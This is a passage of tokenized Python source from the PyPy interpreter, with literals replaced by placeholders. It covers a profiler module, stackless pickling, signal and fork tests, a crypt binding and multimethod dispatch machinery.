<EOL> subentry . recursionLevel -= <NUM_LIT:1> <EOL> if subentry . recursionLevel == <NUM_LIT:0> : <EOL> subentry . tt += tt <EOL> else : <EOL> subentry . recursivecallcount += <NUM_LIT:1> <EOL> subentry . it += it <EOL> subentry . callcount += <NUM_LIT:1> <EOL> def create_spec ( space , w_arg ) : <EOL> if isinstance ( w_arg , Method ) : <EOL> w_function = w_arg . w_function <EOL> class_name = w_arg . w_class . getname ( space , '<STR_LIT:?>' ) <EOL> assert isinstance ( w_function , Function ) <EOL> return "<STR_LIT>" % ( w_function . name , class_name ) <EOL> elif isinstance ( w_arg , Function ) : <EOL> if w_arg . w_module is None : <EOL> module = '<STR_LIT>' <EOL> else : <EOL> module = space . str_w ( w_arg . w_module ) <EOL> if module == '<STR_LIT>' : <EOL> module = '<STR_LIT>' <EOL> else : <EOL> module += '<STR_LIT:.>' <EOL> return '<STR_LIT>' % ( module , w_arg . name ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def lsprof_call ( space , w_self , frame , event , w_arg ) : <EOL> assert isinstance ( w_self , W_Profiler ) <EOL> if event == '<STR_LIT>' : <EOL> code = frame . getcode ( ) <EOL> w_self . _enter_call ( code ) <EOL> elif event == '<STR_LIT>' : <EOL> code = frame . getcode ( ) <EOL> w_self . _enter_return ( code ) <EOL> elif event == '<STR_LIT>' : <EOL> if w_self . builtins : <EOL> key = create_spec ( space , w_arg ) <EOL> w_self . _enter_builtin_call ( key ) <EOL> elif event == '<STR_LIT>' : <EOL> if w_self . builtins : <EOL> key = create_spec ( space , w_arg ) <EOL> w_self . _enter_builtin_return ( key ) <EOL> else : <EOL> pass <EOL> class W_Profiler ( Wrappable ) : <EOL> def __init__ ( self , space , w_callable , time_unit , subcalls , builtins ) : <EOL> self . subcalls = subcalls <EOL> self . builtins = builtins <EOL> self . current_context = None <EOL> self . w_callable = w_callable <EOL> self . time_unit = time_unit <EOL> self . data = { } <EOL> self . builtin_data = { } <EOL> self . space = space <EOL> def timer ( self ) : <EOL> if self . w_callable : <EOL> space = self . space <EOL> return space . float_w ( space . call_function ( self . w_callable ) ) <EOL> return time . time ( ) <EOL> def enable ( self , space , w_subcalls = NoneNotWrapped , <EOL> w_builtins = NoneNotWrapped ) : <EOL> if w_subcalls is not None : <EOL> self . subcalls = space . bool_w ( w_subcalls ) <EOL> if w_builtins is not None : <EOL> self . builtins = space . bool_w ( w_builtins ) <EOL> space . getexecutioncontext ( ) . setllprofile ( lsprof_call , space . wrap ( self ) ) <EOL> enable . unwrap_spec = [ '<STR_LIT>' , ObjSpace , W_Root , W_Root ] <EOL> def _enter_call ( self , f_code ) : <EOL> try : <EOL> entry = self . data [ f_code ] <EOL> except KeyError : <EOL> entry = ProfilerEntry ( f_code ) <EOL> self . data [ f_code ] = entry <EOL> self . current_context = ProfilerContext ( self , entry ) <EOL> def _enter_return ( self , f_code ) : <EOL> context = self . current_context <EOL> if context is None : <EOL> return <EOL> try : <EOL> entry = self . data [ f_code ] <EOL> context . _stop ( self , entry ) <EOL> except KeyError : <EOL> pass <EOL> self . current_context = context . previous <EOL> def _enter_builtin_call ( self , key ) : <EOL> try : <EOL> entry = self . builtin_data [ key ] <EOL> except KeyError : <EOL> entry = ProfilerEntry ( self . space . wrap ( key ) ) <EOL> self . builtin_data [ key ] = entry <EOL> self . current_context = ProfilerContext ( self , entry ) <EOL> def _enter_builtin_return ( self , key ) : <EOL> context = self . current_context <EOL> if context is None : <EOL> return <EOL> try : <EOL> entry = self . builtin_data [ key ] <EOL> context . _stop ( self , entry ) <EOL> except KeyError : <EOL> pass <EOL> self . current_context = context . previous <EOL> def _flush_unmatched ( self ) : <EOL> context = self . current_context <EOL> while context : <EOL> entry = context . entry <EOL> if entry : <EOL> context . _stop ( self , entry ) <EOL> context = context . previous <EOL> self . current_context = None <EOL> def disable ( self , space ) : <EOL> space . getexecutioncontext ( ) . setllprofile ( None , None ) <EOL> self . _flush_unmatched ( ) <EOL> disable . unwrap_spec = [ '<STR_LIT>' , ObjSpace ] <EOL> def getstats ( self , space ) : <EOL> if self . w_callable is None : <EOL> factor = <NUM_LIT:1.> <EOL> elif self . time_unit > <NUM_LIT:0.0> : <EOL> factor = self . time_unit <EOL> else : <EOL> factor = <NUM_LIT:1.0> / sys . maxint <EOL> return stats ( space , self . data . values ( ) + self . builtin_data . values ( ) , <EOL> factor ) <EOL> getstats . unwrap_spec = [ '<STR_LIT>' , ObjSpace ] <EOL> def descr_new_profile ( space , w_type , w_callable = NoneNotWrapped , time_unit = <NUM_LIT:0.0> , <EOL> subcalls = True , builtins = True ) : <EOL> p = space . allocate_instance ( W_Profiler , w_type ) <EOL> p . __init__ ( space , w_callable , time_unit , subcalls , builtins ) <EOL> return space . wrap ( p ) <EOL> descr_new_profile . unwrap_spec = [ ObjSpace , W_Root , W_Root , float , bool , bool ] <EOL> W_Profiler . typedef = TypeDef ( <EOL> '<STR_LIT>' , <EOL> __new__ = interp2app ( descr_new_profile ) , <EOL> enable = interp2app ( W_Profiler . enable ) , <EOL> disable = interp2app ( W_Profiler . disable ) , <EOL> getstats = interp2app ( W_Profiler . getstats ) , <EOL> ) </s>
<s> from pypy . conftest import gettestobjspace , option <EOL> import py <EOL> class AppTestBasic : <EOL> def setup_class ( cls ) : <EOL> cls . space = gettestobjspace ( usemodules = ( '<STR_LIT>' , ) ) <EOL> def test_pickle_main ( self ) : <EOL> import _stackless , pickle <EOL> main = _stackless . coroutine . getcurrent ( ) <EOL> s = pickle . dumps ( main ) <EOL> c = pickle . loads ( s ) <EOL> assert c is main <EOL> class AppTestPickle : <EOL> def setup_class ( cls ) : <EOL> if not option . runappdirect : <EOL> py . test . skip ( '<STR_LIT>' ) <EOL> cls . space = gettestobjspace ( usemodules = ( '<STR_LIT>' , ) ) <EOL> def test_simple_ish ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_closure ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_exception ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_loop ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_valstack ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_exec_and_locals ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> def test_solver ( self ) : <EOL> import new , sys <EOL> mod = new . module ( '<STR_LIT>' ) <EOL> sys . modules [ '<STR_LIT>' ] = mod <EOL> try : <EOL> exec '''<STR_LIT>''' in mod . __dict__ <EOL> finally : <EOL> del sys . modules [ '<STR_LIT>' ] </s>
<s> from pypy . interpreter . error import OperationError <EOL> from pypy . interpreter . baseobjspace import ObjSpace , W_Root <EOL> from pypy . rpython . lltypesystem import rffi , lltype <EOL> from pypy . translator . tool . cbuild import ExternalCompilationInfo <EOL> import sys <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> eci = ExternalCompilationInfo ( ) <EOL> else : <EOL> eci = ExternalCompilationInfo ( libraries = [ '<STR_LIT>' ] ) <EOL> c_crypt = rffi . llexternal ( '<STR_LIT>' , [ rffi . CCHARP , rffi . CCHARP ] , rffi . CCHARP , <EOL> compilation_info = eci , threadsafe = False ) <EOL> def crypt ( space , word , salt ) : <EOL> """<STR_LIT>""" <EOL> res = c_crypt ( word , salt ) <EOL> if not res : <EOL> return space . w_None <EOL> str_res = rffi . charp2str ( res ) <EOL> return space . wrap ( str_res ) <EOL> crypt . unwrap_spec = [ ObjSpace , str , str ] </s>
<s> from pypy . interpreter . mixedmodule import MixedModule <EOL> class Module ( MixedModule ) : <EOL> applevel_name = '<STR_LIT>' <EOL> interpleveldefs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> appleveldefs = { } </s>
<s> def pytest_addoption ( parser ) : <EOL> group = parser . addgroup ( "<STR_LIT>" ) <EOL> group . addoption ( "<STR_LIT>" , action = "<STR_LIT:store>" , default = None , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) </s>
<s> import os , py <EOL> from pypy import conftest ; conftest . translation_test_so_skip_if_appdirect ( ) <EOL> from pypy . translator . c . test . test_genc import compile <EOL> from pypy . module . signal import interp_signal <EOL> def setup_module ( mod ) : <EOL> if not hasattr ( os , '<STR_LIT>' ) or not hasattr ( os , '<STR_LIT>' ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> def check ( expected ) : <EOL> res = interp_signal . pypysig_poll ( ) <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" % ( res , expected ) ) <EOL> assert res == expected <EOL> def test_simple ( ) : <EOL> import os <EOL> check ( - <NUM_LIT:1> ) <EOL> check ( - <NUM_LIT:1> ) <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> interp_signal . pypysig_setflag ( interp_signal . SIGUSR1 ) <EOL> os . kill ( os . getpid ( ) , interp_signal . SIGUSR1 ) <EOL> check ( interp_signal . SIGUSR1 ) <EOL> check ( - <NUM_LIT:1> ) <EOL> check ( - <NUM_LIT:1> ) <EOL> interp_signal . pypysig_ignore ( interp_signal . SIGUSR1 ) <EOL> os . kill ( os . getpid ( ) , interp_signal . SIGUSR1 ) <EOL> check ( - <NUM_LIT:1> ) <EOL> check ( - <NUM_LIT:1> ) <EOL> interp_signal . pypysig_default ( interp_signal . SIGUSR1 ) <EOL> check ( - <NUM_LIT:1> ) <EOL> def test_compile ( ) : <EOL> fn = compile ( test_simple , [ ] ) <EOL> fn ( ) </s>
<s> import py , sys <EOL> from pypy . conftest import gettestobjspace <EOL> from pypy . module . thread . test . support import GenericTestThread <EOL> class AppTestFork ( GenericTestThread ) : <EOL> def test_fork ( self ) : <EOL> import thread <EOL> import os <EOL> import time <EOL> if not hasattr ( os , '<STR_LIT>' ) : <EOL> skip ( "<STR_LIT>" ) <EOL> run = True <EOL> done = [ ] <EOL> def busy_thread ( ) : <EOL> while run : <EOL> time . sleep ( <NUM_LIT:0> ) <EOL> done . append ( None ) <EOL> try : <EOL> thread . start_new ( busy_thread , ( ) ) <EOL> pid = os . fork ( ) <EOL> if pid == <NUM_LIT:0> : <EOL> os . _exit ( <NUM_LIT:0> ) <EOL> else : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> spid , status = os . waitpid ( pid , os . WNOHANG ) <EOL> assert spid == pid <EOL> finally : <EOL> run = False <EOL> self . waitfor ( lambda : done ) </s>
<s> """<STR_LIT>""" <EOL> class error ( Exception ) : <EOL> """<STR_LIT>""" </s>
<s> from pypy . interpreter . baseobjspace import ObjSpace <EOL> from pypy . interpreter . error import OperationError <EOL> from pypy . objspace . descroperation import DescrOperation <EOL> from pypy . objspace . std . multimethod import FailedToImplement <EOL> from pypy . objspace . std . boolobject import W_BoolObject <EOL> from pypy . tool . sourcetools import func_with_new_name <EOL> METHODS_WITH_SHORTCUT = dict . fromkeys ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:str>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:int>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> KNOWN_MISSING = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:float>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> for _name , _ , _ , _specialmethods in ObjSpace . MethodTable : <EOL> if _specialmethods : <EOL> assert _name in METHODS_WITH_SHORTCUT or _name in KNOWN_MISSING , ( <EOL> "<STR_LIT>" <EOL> % ( _name , ) ) <EOL> def filter_out_conversions ( typeorder ) : <EOL> res = { } <EOL> for cls , order in typeorder . iteritems ( ) : <EOL> res [ cls ] = [ ( target_type , converter ) for ( target_type , converter ) in <EOL> order if converter is None ] <EOL> return res <EOL> def install ( space , mm , fallback_mm = None ) : <EOL> """<STR_LIT>""" <EOL> name = mm . name <EOL> if name not in METHODS_WITH_SHORTCUT : <EOL> return None <EOL> if name in space . __dict__ : <EOL> mm1 , shortcut_method = space . __dict__ [ name ] . builtinshortcut <EOL> assert mm1 is mm <EOL> return shortcut_method <EOL> assert hasattr ( DescrOperation , name ) <EOL> base_method = getattr ( space . __class__ , name ) <EOL> expanded_order = space . model . get_typeorder_with_empty_usersubcls ( ) <EOL> if fallback_mm : <EOL> mm = mm . merge_with ( fallback_mm ) <EOL> shortcut_method = mm . install_not_sliced ( filter_out_conversions ( expanded_order ) ) <EOL> def operate ( * args_w ) : <EOL> try : <EOL> return shortcut_method ( space , * args_w ) <EOL> except FailedToImplement : <EOL> pass <EOL> return base_method ( space , * args_w ) <EOL> operate = func_with_new_name ( operate , name ) <EOL> operate . builtinshortcut = ( mm , shortcut_method ) <EOL> setattr ( space , name , operate ) <EOL> return shortcut_method <EOL> def install_is_true ( space , mm_nonzero , mm_len ) : <EOL> shortcut = install ( space , mm_nonzero , fallback_mm = mm_len ) <EOL> assert '<STR_LIT>' not in space . __dict__ <EOL> def is_true ( w_obj ) : <EOL> try : <EOL> w_res = shortcut ( space , w_obj ) <EOL> except FailedToImplement : <EOL> pass <EOL> else : <EOL> if isinstance ( w_res , W_BoolObject ) : <EOL> return w_res . boolval <EOL> try : <EOL> return space . int_w ( w_res ) != <NUM_LIT:0> <EOL> except OperationError : <EOL> w_obj = w_res <EOL> return DescrOperation . is_true ( space , w_obj ) <EOL> space . is_true = is_true </s>
<s> from pypy . tool . sourcetools import compile2 <EOL> class FailedToImplement ( Exception ) : <EOL> def __init__ ( self , w_type = None , w_value = None ) : <EOL> self . w_type = w_type <EOL> self . w_value = w_value <EOL> def raiseFailedToImplement ( ) : <EOL> raise FailedToImplement <EOL> class MultiMethodTable : <EOL> def __init__ ( self , arity , root_class , argnames_before = [ ] , argnames_after = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if arity < <NUM_LIT:1> : <EOL> raise ValueError , "<STR_LIT>" <EOL> self . arity = arity <EOL> self . root_class = root_class <EOL> self . dispatch_tree = { } <EOL> self . argnames_before = list ( argnames_before ) <EOL> self . argnames_after = list ( argnames_after ) <EOL> def register ( self , function , * types , ** kwds ) : <EOL> assert len ( types ) == self . arity <EOL> assert kwds . keys ( ) == [ ] or kwds . keys ( ) == [ '<STR_LIT>' ] <EOL> order = kwds . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> node = self . dispatch_tree <EOL> for type in types [ : - <NUM_LIT:1> ] : <EOL> node = node . setdefault ( type , { } ) <EOL> lst = node . setdefault ( types [ - <NUM_LIT:1> ] , [ ] ) <EOL> if order >= len ( lst ) : <EOL> lst += [ None ] * ( order + <NUM_LIT:1> - len ( lst ) ) <EOL> assert lst [ order ] is None , "<STR_LIT>" % ( <EOL> types , order ) <EOL> lst [ order ] = function <EOL> def install ( self , prefix , list_of_typeorders , baked_perform_call = True , <EOL> base_typeorder = None , installercls = None ) : <EOL> "<STR_LIT>" <EOL> assert len ( list_of_typeorders ) == self . arity <EOL> installercls = installercls or Installer <EOL> installer = installercls ( self , prefix , list_of_typeorders , <EOL> baked_perform_call = baked_perform_call , <EOL> base_typeorder = base_typeorder ) <EOL> return installer . install ( ) <EOL> def install_if_not_empty ( self , prefix , list_of_typeorders , <EOL> base_typeorder = None , installercls = None ) : <EOL> "<STR_LIT>" <EOL> assert len ( list_of_typeorders ) == self . arity <EOL> installercls = installercls or Installer <EOL> installer = installercls ( self , prefix , list_of_typeorders , <EOL> base_typeorder = base_typeorder ) <EOL> if installer . is_empty ( ) : <EOL> return None <EOL> else : <EOL> return installer . install ( ) <EOL> def getfunctions ( self , types ) : <EOL> assert len ( types ) == self . arity <EOL> node = self . dispatch_tree <EOL> for type in types : <EOL> node = node [ type ] <EOL> return [ fn for fn in node if fn is not None ] <EOL> def has_signature ( self , types ) : <EOL> try : <EOL> self . getfunctions ( types ) <EOL> except KeyError : <EOL> return False <EOL> else : <EOL> return True <EOL> def signatures ( self ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> def enum_keys ( types_so_far , node ) : <EOL> for type , subnode in node . items ( ) : <EOL> next_types = types_so_far + ( type , ) <EOL> if isinstance ( subnode , dict ) : <EOL> enum_keys ( next_types , subnode ) <EOL> else : <EOL> assert len ( next_types ) == self . arity <EOL> result . append ( next_types ) <EOL> enum_keys ( ( ) , self . dispatch_tree ) <EOL> return result <EOL> class InstallerVersion1 : <EOL> """<STR_LIT>""" <EOL> instance_counter = <NUM_LIT:0> <EOL> mmfunccache = { } <EOL> prefix_memo = { } <EOL> def __init__ ( self , multimethod , prefix , list_of_typeorders , <EOL> baked_perform_call = True , base_typeorder = None ) : <EOL> self . __class__ . instance_counter += <NUM_LIT:1> <EOL> self . multimethod = multimethod <EOL> base_prefix = prefix <EOL> n = <NUM_LIT:1> <EOL> while prefix in self . prefix_memo : <EOL> n += <NUM_LIT:1> <EOL> prefix = "<STR_LIT>" % ( base_prefix , n ) <EOL> self . prefix = prefix <EOL> self . prefix_memo [ prefix ] = <NUM_LIT:1> <EOL> self . list_of_typeorders = list_of_typeorders <EOL> self . check_typeorders ( ) <EOL> self . subtree_cache = { } <EOL> self . to_install = [ ] <EOL> self . non_empty = self . build_tree ( [ ] , multimethod . dispatch_tree ) <EOL> self . baked_perform_call = baked_perform_call <EOL> if self . non_empty : <EOL> perform = [ ( None , prefix , <NUM_LIT:0> ) ] <EOL> else : <EOL> perform = [ ] <EOL> self . perform_call = self . build_function ( None , prefix + '<STR_LIT>' , <EOL> None , perform ) <EOL> def check_typeorders ( self ) : <EOL> for typeorder in self . list_of_typeorders : <EOL> for type in typeorder : <EOL> assert '<STR_LIT>' not in type . __name__ , ( <EOL> "<STR_LIT>" % ( type , ) ) <EOL> names = dict . fromkeys ( [ type . __name__ for type in typeorder ] ) <EOL> assert len ( names ) == len ( typeorder ) , ( <EOL> "<STR_LIT>" % ( typeorder , ) ) <EOL> def is_empty ( self ) : <EOL> return not self . non_empty <EOL> def install ( self ) : <EOL> def class_key ( cls ) : <EOL> "<STR_LIT>" <EOL> return len ( cls . __mro__ ) <EOL> def key ( target , funcname , func , source , fallback ) : <EOL> if target is None : <EOL> return ( ) <EOL> return ( class_key ( target ) , not fallback ) <EOL> self . to_install . sort ( lambda a , b : cmp ( key ( * a ) , key ( * b ) ) ) <EOL> for target , funcname , func , source , fallback in self . to_install : <EOL> if target is not None : <EOL> parentfunc = getattr ( target , funcname , None ) <EOL> parentfunc = getattr ( parentfunc , '<STR_LIT>' , None ) <EOL> if parentfunc is func : <EOL> continue <EOL> setattr ( target , funcname , func ) <EOL> return self . perform_call <EOL> def build_tree ( self , types_so_far , dispatch_node ) : <EOL> key = tuple ( types_so_far ) <EOL> if key in self . subtree_cache : <EOL> return self . subtree_cache [ key ] <EOL> non_empty = False <EOL> typeorder = self . list_of_typeorders [ len ( types_so_far ) ] <EOL> for next_type in typeorder : <EOL> if self . build_single_method ( typeorder , types_so_far , next_type , <EOL> dispatch_node ) : <EOL> non_empty = True <EOL> self . subtree_cache [ key ] = non_empty <EOL> return non_empty <EOL> def build_single_method ( self , typeorder , types_so_far , next_type , <EOL> dispatch_node ) : <EOL> funcname = '<STR_LIT>' . join ( [ self . prefix ] + [ t . __name__ for t in types_so_far ] ) <EOL> order = typeorder [ next_type ] <EOL> things_to_call = [ ] <EOL> for type , conversion in order : <EOL> if type not in dispatch_node : <EOL> continue <EOL> match = dispatch_node [ type ] <EOL> if isinstance ( match , dict ) : <EOL> if self . build_tree ( types_so_far + [ type ] , match ) : <EOL> call = funcname + '<STR_LIT>' + type . __name__ <EOL> call_selfarg_index = len ( types_so_far ) + <NUM_LIT:1> <EOL> things_to_call . append ( ( conversion , call , <EOL> call_selfarg_index ) ) <EOL> else : <EOL> for func in match : <EOL> if func is not None : <EOL> things_to_call . append ( ( conversion , func , None ) ) <EOL> funcname = intern ( funcname ) <EOL> self . build_function ( next_type , funcname , len ( types_so_far ) , <EOL> things_to_call ) <EOL> return bool ( things_to_call ) <EOL> def build_function ( self , target , funcname , func_selfarg_index , <EOL> things_to_call ) : <EOL> miniglobals = { '<STR_LIT>' : FailedToImplement , '<STR_LIT>' : __name__ } <EOL> def invent_name ( obj ) : <EOL> if isinstance ( obj , str ) : <EOL> return obj <EOL> name = obj . __name__ <EOL> n = <NUM_LIT:1> <EOL> while name in miniglobals : <EOL> n += <NUM_LIT:1> <EOL> name = '<STR_LIT>' % ( obj . __name__ , n ) <EOL> miniglobals [ name ] = obj <EOL> return name <EOL> funcargs = [ '<STR_LIT>' % i for i in range ( self . multimethod . arity ) ] <EOL> bodylines = [ ] <EOL> for conversion , call , call_selfarg_index in things_to_call : <EOL> callargs = funcargs [ : ] <EOL> if conversion is not None : <EOL> to_convert = func_selfarg_index <EOL> convert_callargs = ( self . multimethod . argnames_before + <EOL> [ callargs [ to_convert ] ] ) <EOL> callargs [ to_convert ] = '<STR_LIT>' % ( <EOL> invent_name ( conversion ) , '<STR_LIT:U+002CU+0020>' . join ( convert_callargs ) ) <EOL> callname = invent_name ( call ) <EOL> if call_selfarg_index is not None : <EOL> self . build_function ( self . multimethod . root_class , <EOL> callname , call_selfarg_index , [ ] ) <EOL> callname = '<STR_LIT>' % ( callargs . pop ( call_selfarg_index ) , callname ) <EOL> callargs = ( self . multimethod . argnames_before + <EOL> callargs + self . multimethod . argnames_after ) <EOL> bodylines . append ( '<STR_LIT>' % ( callname , '<STR_LIT:U+002CU+0020>' . join ( callargs ) ) ) <EOL> fallback = False <EOL> if not bodylines : <EOL> miniglobals [ '<STR_LIT>' ] = raiseFailedToImplement <EOL> bodylines = [ '<STR_LIT>' ] <EOL> fallback = True <EOL> for i in range ( len ( bodylines ) - <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> bodylines [ i : i + <NUM_LIT:1> ] = [ '<STR_LIT>' , <EOL> '<STR_LIT:U+0020>' + bodylines [ i ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if func_selfarg_index is not None : <EOL> selfargs = [ funcargs . pop ( func_selfarg_index ) ] <EOL> else : <EOL> selfargs = [ ] <EOL> funcargs = ( selfargs + self . multimethod . argnames_before + <EOL> funcargs + self . multimethod . argnames_after ) <EOL> if target is None and not self . baked_perform_call : <EOL> return funcargs , bodylines [ <NUM_LIT:0> ] [ len ( '<STR_LIT>' ) : ] , miniglobals , fallback <EOL> bodylines = [ '<STR_LIT:U+0020>' + line for line in bodylines ] <EOL> bodylines . insert ( <NUM_LIT:0> , '<STR_LIT>' % ( funcname , '<STR_LIT:U+002CU+0020>' . join ( funcargs ) ) ) <EOL> bodylines . append ( '<STR_LIT>' ) <EOL> source = '<STR_LIT:\n>' . join ( bodylines ) <EOL> l = miniglobals . items ( ) <EOL> l . sort ( ) <EOL> l = tuple ( l ) <EOL> key = ( source , l ) <EOL> try : <EOL> func = self . mmfunccache [ key ] <EOL> except KeyError : <EOL> exec compile2 ( source ) in miniglobals <EOL> func = miniglobals [ funcname ] <EOL> self . mmfunccache [ key ] = func <EOL> self . to_install . append ( ( target , funcname , func , source , fallback ) ) <EOL> return func <EOL> class MMDispatcher ( object ) : <EOL> """<STR_LIT>""" <EOL> _revcache = None <EOL> def __init__ ( self , multimethod , list_of_typeorders ) : <EOL> self . multimethod = multimethod <EOL> self . list_of_typeorders = list_of_typeorders <EOL> def __call__ ( self , * args ) : <EOL> i = len ( self . multimethod . argnames_before ) <EOL> j = i + self . multimethod . arity <EOL> k = j + len ( self . multimethod . argnames_after ) <EOL> assert len ( args ) == k <EOL> prefixargs = args [ : i ] <EOL> dispatchargs = args [ i : j ] <EOL> suffixargs = args [ j : ] <EOL> return self . dispatch ( [ x . __class__ for x in dispatchargs ] , <EOL> prefixargs , <EOL> dispatchargs , <EOL> suffixargs ) <EOL> def dispatch ( self , argtypes , prefixargs , args , suffixargs ) : <EOL> def expr ( v ) : <EOL> if isinstance ( v , Call ) : <EOL> return v . function ( * [ expr ( w ) for w in v . arguments ] ) <EOL> else : <EOL> return v <EOL> e = None <EOL> for v in self . expressions ( argtypes , prefixargs , args , suffixargs ) : <EOL> try : <EOL> return expr ( v ) <EOL> except FailedToImplement , e : <EOL> pass <EOL> else : <EOL> raise e or FailedToImplement ( ) <EOL> def expressions ( self , argtypes , prefixargs , args , suffixargs ) : <EOL> """<STR_LIT>""" <EOL> prefixargs = tuple ( prefixargs ) <EOL> suffixargs = tuple ( suffixargs ) <EOL> def walktree ( node , args_so_far ) : <EOL> if isinstance ( node , list ) : <EOL> for func in node : <EOL> if func is not None : <EOL> result . append ( Call ( func , prefixargs + <EOL> args_so_far + <EOL> suffixargs ) ) <EOL> else : <EOL> index = len ( args_so_far ) <EOL> typeorder = self . list_of_typeorders [ index ] <EOL> next_type = argtypes [ index ] <EOL> for target_type , converter in typeorder [ next_type ] : <EOL> if target_type not in node : <EOL> continue <EOL> next_arg = args [ index ] <EOL> if converter : <EOL> next_arg = Call ( converter , prefixargs + ( next_arg , ) ) <EOL> walktree ( node [ target_type ] , args_so_far + ( next_arg , ) ) <EOL> result = [ ] <EOL> walktree ( self . multimethod . dispatch_tree , ( ) ) <EOL> return result <EOL> def anychance ( self , typesprefix ) : <EOL> if self . _revcache is None : <EOL> def build_tree ( types_so_far , dispatch_node ) : <EOL> non_empty = False <EOL> typeorder = self . list_of_typeorders [ len ( types_so_far ) ] <EOL> for next_type in typeorder : <EOL> if build_single_method ( typeorder , types_so_far , next_type , <EOL> dispatch_node ) : <EOL> non_empty = True <EOL> if non_empty : <EOL> self . _revcache [ types_so_far ] = True <EOL> return non_empty <EOL> def build_single_method ( typeorder , types_so_far , next_type , <EOL> dispatch_node ) : <EOL> order = typeorder [ next_type ] <EOL> things_to_call = False <EOL> for type , conversion in order : <EOL> if type not in dispatch_node : <EOL> continue <EOL> match = dispatch_node [ type ] <EOL> if isinstance ( match , dict ) : <EOL> if build_tree ( types_so_far + ( next_type , ) , match ) : <EOL> things_to_call = True <EOL> elif match : <EOL> things_to_call = True <EOL> return things_to_call <EOL> self . _revcache = { } <EOL> build_tree ( ( ) , self . multimethod . dispatch_tree ) <EOL> return tuple ( typesprefix ) in self . _revcache <EOL> class Call ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , function , arguments ) : <EOL> self . function = function <EOL> self . arguments = arguments <EOL> class CompressedArray ( object ) : <EOL> def __init__ ( self , null_value ) : <EOL> self . null_value = null_value <EOL> self . items = [ null_value ] <EOL> def ensure_length ( self , newlen ) : <EOL> if newlen > len ( self . items ) : <EOL> self . items . extend ( [ self . null_value ] * ( newlen - len ( self . items ) ) ) <EOL> def insert_subarray ( self , array ) : <EOL> if array . count ( self . null_value ) == len ( array ) : <EOL> return <NUM_LIT:0> <EOL> test = <NUM_LIT:1> <EOL> while True : <EOL> self . ensure_length ( test + len ( array ) ) <EOL> for i in range ( len ( array ) ) : <EOL> if not ( array [ i ] == self . items [ test + i ] or <EOL> array [ i ] == self . null_value or <EOL> self . items [ test + i ] == self . null_value ) : <EOL> break <EOL> else : <EOL> for i in range ( len ( array ) ) : <EOL> if array [ i ] != self . null_value : <EOL> self . items [ test + i ] = array [ i ] <EOL> return test <EOL> test += <NUM_LIT:1> <EOL> def 